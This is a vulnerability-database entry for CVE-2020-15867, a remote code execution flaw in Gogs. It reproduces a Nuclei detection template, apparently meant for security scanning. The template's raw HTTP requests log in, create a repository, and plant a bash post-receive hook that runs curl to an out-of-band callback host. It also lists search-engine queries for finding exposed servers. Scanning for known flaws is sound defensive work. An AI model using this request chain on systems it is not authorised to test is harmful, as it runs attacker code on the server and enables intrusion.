Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-15867
HistoryMar 18, 2023 - 10:07 p.m.

Gogs 0.5.5 - 0.12.2 - Remote Code Execution

2023-03-1822:07:09
ProjectDiscovery
github.com
4
cve
rce
gogs
git
authenticated
packetstorm
intrusive
exploit
privilege
escalation
arbitrary
code
execution
remote

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.5 High

AI Score

Confidence

High

0.967 High

EPSS

Percentile

99.7%

Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
id: CVE-2020-15867

info:
  name: Gogs 0.5.5 - 0.12.2 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later).
  reference:
    - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
    - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
    - http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15867
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2020-15867
    epss-score: 0.96659
    epss-percentile: 0.99554
    cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: gogs
    product: gogs
    shodan-query:
      - cpe:"cpe:2.3:a:gogs:gogs"
      - http.title:"sign in - gogs"
    fofa-query: title="sign in - gogs"
    google-query: intitle:"sign in - gogs"
  tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
      - |
        POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
      - |
        GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: body_1
        words:
          - content="Gogs

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - name="_csrf" value="(.*)"
        internal: true

      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - name="_csrf" content="(.*)"
        internal: true

      - type: regex
        name: last_commit
        group: 1
        regex:
          - name="last_commit" value="(.*)"
        internal: true
# digest: 4b0a00483046022100d19b4304084cc6b071b54c10afcde5eba6a57ae96b711e27539d368d5ab91437022100d710877d2115203f1e1bff71a3db637617969a02871595a48423bfb41e2a44a3:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.5 High

AI Score

Confidence

High

0.967 High

EPSS

Percentile

99.7%